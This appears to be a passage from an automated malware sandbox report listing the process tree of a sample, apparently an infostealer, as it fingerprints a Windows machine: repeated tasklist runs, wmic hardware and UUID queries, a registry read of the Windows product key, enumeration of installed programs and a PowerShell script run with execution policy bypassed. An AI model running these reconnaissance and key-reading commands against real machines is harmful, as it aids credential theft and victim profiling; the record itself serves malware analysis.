- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:2868
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:8128
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:2228
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:7772
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:1128
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:7864
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:456
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:8268
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:888
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:7568
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:5092
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:8260
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:2536
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:7560
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:4612
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:8136
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:2500
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:7700
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:5136
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:8368
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:5152
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:8144
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:5192
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:8240
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:5224
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:8248
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:5244
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:7880
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:5260
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:7920
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:5268
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:7928
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:5280
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:8204
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:5292
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:8012
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:5304
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:7004
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:5312
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:8300
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:5336
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:8076
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "net session"
    3⤵
    PID:5356
  - - C:\Windows\system32\net.exe
      net session
      4⤵
      PID:7552
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        5⤵
        
        PID:8444
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Users\Admin\AppData\Local\Temp\2e3rU903Ce3XSSz2WFWcnXhx8v8\resources\app.asar.unpacked\bind\main.exe"
    3⤵
    PID:5380
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"
    3⤵
    PID:5400
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:8276
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "wmic OS get caption, osarchitecture | more +1"
    3⤵
    PID:5428
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic OS get caption, osarchitecture
      4⤵
      PID:7848
  - - C:\Windows\system32\more.com
      more +1
      4⤵
      PID:8312
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get name | more +1"
    3⤵
    PID:11252
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get name
      4⤵
      PID:3232
  - - C:\Windows\system32\more.com
      more +1
      4⤵
      PID:4916
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController get name | more +1"
    3⤵
    PID:6520
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic PATH Win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:2504
  - - C:\Windows\system32\more.com
      more +1
      4⤵
      PID:1364
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:5084
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      PID:4832
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion' -Name ProductName"
    3⤵
    PID:5376
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion' -Name ProductName
      4⤵
      PID:5556
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:5956
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:5976
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=NaN get ExecutablePath"
    3⤵
    PID:6504
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic process where processid=NaN get ExecutablePath
      4⤵
      PID:6684
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall""
    3⤵
    PID:6916
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"
      4⤵
      PID:6936
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall""
    3⤵
    PID:6948
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"
      4⤵
      PID:6972
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip""
    3⤵
    PID:6976
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip"
      4⤵
      PID:7300
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook""
    3⤵
    PID:1912
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook"
      4⤵
      PID:7120
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager""
    3⤵
    PID:7032
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager"
      4⤵
      PID:7364
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx""
    3⤵
    PID:7052
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx"
      4⤵
      PID:5372
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime""
    3⤵
    PID:7196
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime"
      4⤵
      PID:7256
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore""
    3⤵
    PID:7352
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore"
      4⤵
      PID:7116
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40""
    3⤵
    PID:7356
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40"
      4⤵
      PID:7212
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data""
    3⤵
    PID:7320
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data"
      4⤵
      PID:7344
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX""
    3⤵
    PID:7280
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX"
      4⤵
      PID:8004
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData""
    3⤵
    PID:8096
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData"
      4⤵
      PID:8328
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack""
    3⤵
    PID:8216
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack"
      4⤵
      PID:8484
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 105.0.3 (x64 en-US)""
    3⤵
    PID:8340
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 105.0.3 (x64 en-US)"
      4⤵
      PID:8572
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService""
    3⤵
    PID:8568
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService"
      4⤵
      PID:8908
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2""
    3⤵
    PID:8520
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2"
      4⤵
      PID:8764
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ProPlusRetail - en-us""
    3⤵
    PID:8596
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ProPlusRetail - en-us"
      4⤵
      PID:8780
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent""
    3⤵
    PID:8940
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent"
      4⤵
      PID:8948
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VLC media player""
    3⤵
    PID:9124
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VLC media player"
      4⤵
      PID:3304
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC""
    3⤵
    PID:3344
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC"
      4⤵
      PID:10244
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{113C0ADC-B9BD-4F95-9653-4F5BC540ED03}""
    3⤵
    PID:832
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{113C0ADC-B9BD-4F95-9653-4F5BC540ED03}"
      4⤵
      PID:10356
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}""
    3⤵
    PID:4528
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}"
      4⤵
      PID:1656
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3544B2EE-E62F-4D11-B79C-3DDEACE94DA5}""
    3⤵
    PID:9676
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3544B2EE-E62F-4D11-B79C-3DDEACE94DA5}"
      4⤵
      PID:10380
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}""
    3⤵
    PID:9672
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}"
      4⤵
      PID:1072
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3A706840-2882-423C-90EB-B31545E2BC7A}""
    3⤵
    PID:4048
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3A706840-2882-423C-90EB-B31545E2BC7A}"
      4⤵
      PID:3308
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}""
    3⤵
    PID:5164
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}"
      4⤵
      PID:5744
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}""
    3⤵
    PID:5564
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}"
      4⤵
      PID:5652
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180381}""
    3⤵
    PID:5560
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180381}"
      4⤵
      PID:2364
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{662A0088-6FCD-45DD-9EA7-68674058AED5}""
    3⤵
    PID:4816
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{662A0088-6FCD-45DD-9EA7-68674058AED5}"
      4⤵
      PID:4476
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6DB765A8-05AF-49A1-A71D-6F645EE3CE41}""
    3⤵
    PID:6032
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6DB765A8-05AF-49A1-A71D-6F645EE3CE41}"
      4⤵
      PID:10340
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{76DEEAB3-122F-4231-83C7-0C35363D02F9}""
    3⤵
    PID:5880
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{76DEEAB3-122F-4231-83C7-0C35363D02F9}"
      4⤵
      PID:10760
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{77924AE4-039E-4CA4-87B4-2F64180381F0}""
    3⤵
    PID:10776
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{77924AE4-039E-4CA4-87B4-2F64180381F0}"
      4⤵
      PID:10796
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-007E-0000-1000-0000000FF1CE}""
    3⤵
    PID:10756
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-007E-0000-1000-0000000FF1CE}"
      4⤵
      PID:10640
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-1000-0000000FF1CE}""
    3⤵
    PID:9600
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-1000-0000000FF1CE}"
      4⤵
      PID:8836
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0409-1000-0000000FF1CE}""
    3⤵
    PID:9032
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0409-1000-0000000FF1CE}"
      4⤵
      PID:8824
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AE86D888-1404-47CC-A7BB-8D86C0503E58}""
    3⤵
    PID:8968
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AE86D888-1404-47CC-A7BB-8D86C0503E58}"
      4⤵
      PID:9228
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{C7141A99-592B-4226-A4E9-B767C1D0FBAF}""
    3⤵
    PID:9144
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{C7141A99-592B-4226-A4E9-B767C1D0FBAF}"
      4⤵
      PID:9928
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}""
    3⤵
    PID:6084
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}"
      4⤵
      PID:5328
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}""
    3⤵
    PID:7408
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}"
      4⤵
      PID:7952
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D44822A8-FC28-42FC-8B1D-21A78579FC79}""
    3⤵
    PID:4252
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D44822A8-FC28-42FC-8B1D-21A78579FC79}"
      4⤵
      PID:6856
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{E016F2B9-01FE-4FAA-882E-ECC43FA49751}""
    3⤵
    PID:9424
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{E016F2B9-01FE-4FAA-882E-ECC43FA49751}"
      4⤵
      PID:1312
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\To13aj58o5X5_tezmp.ps1""
    3⤵
    PID:9348
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\To13aj58o5X5_tezmp.ps1"
      4⤵
      PID:4552
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:9256
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:8844
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:7788
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:5020
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:976
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:6740
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:6436
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:2772
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:7892
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:8056
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:9804
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:4480
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:5908
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:8628
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:792
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:8512
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:1112
